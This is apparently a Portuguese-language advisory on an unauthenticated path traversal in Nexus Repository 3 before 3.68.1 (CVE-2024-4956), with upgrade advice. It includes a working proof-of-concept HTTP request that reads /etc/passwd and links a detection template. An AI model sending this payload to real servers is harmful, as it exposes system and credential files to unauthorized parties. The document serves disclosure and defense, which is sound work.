
Path Traversal Não Autenticado no Nexus Repository 3
O Nexus Repository Manager é um gerenciador de repositórios que organiza, armazena e distribui artefatos necessários para o desenvolvimento.
Uma vulnerabilidade de path traversal foi descoberta no Nexus Repository 3, nas versões anteriores a 3.68.1. Essa vulnerabilidade permite que um atacante crie uma URL para baixar arquivos do sistema fora do escopo da aplicação Nexus Repository, sem qualquer autenticação. Isso representa um risco significativo, pois pode expor arquivos sensíveis do sistema e potencialmente comprometer a segurança do ambiente onde o Nexus Repository está instalado.
Recomenda-se atualizar o Nexus Repository para a versão 3.68.1 ou superior o mais rápido possível para mitigar essa vulnerabilidade.
Para mais informações e detalhes técnicos sobre a vulnerabilidade, consulte o seguinte link:
Referências:
A vulnerabilidade afeta as versões 3.0 a 3.68.0 do Sonatype Nexus Repository Manager.
A atualização do Nexus Repository é a abordagem recomendada para eliminar essa vulnerabilidade. No entanto, opções de mitigação imediata estão disponíveis para implantações que não podem atualizar imediatamente:
Referências:
GET /%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
Com o PoC acima, é possível ver o arquivo /etc/passwd sendo acessado:

(CVE-2024-4956.yaml) https://github.com/erickfernandox/CVE-2024-4956/blob/main/CVE-2024-4956.yaml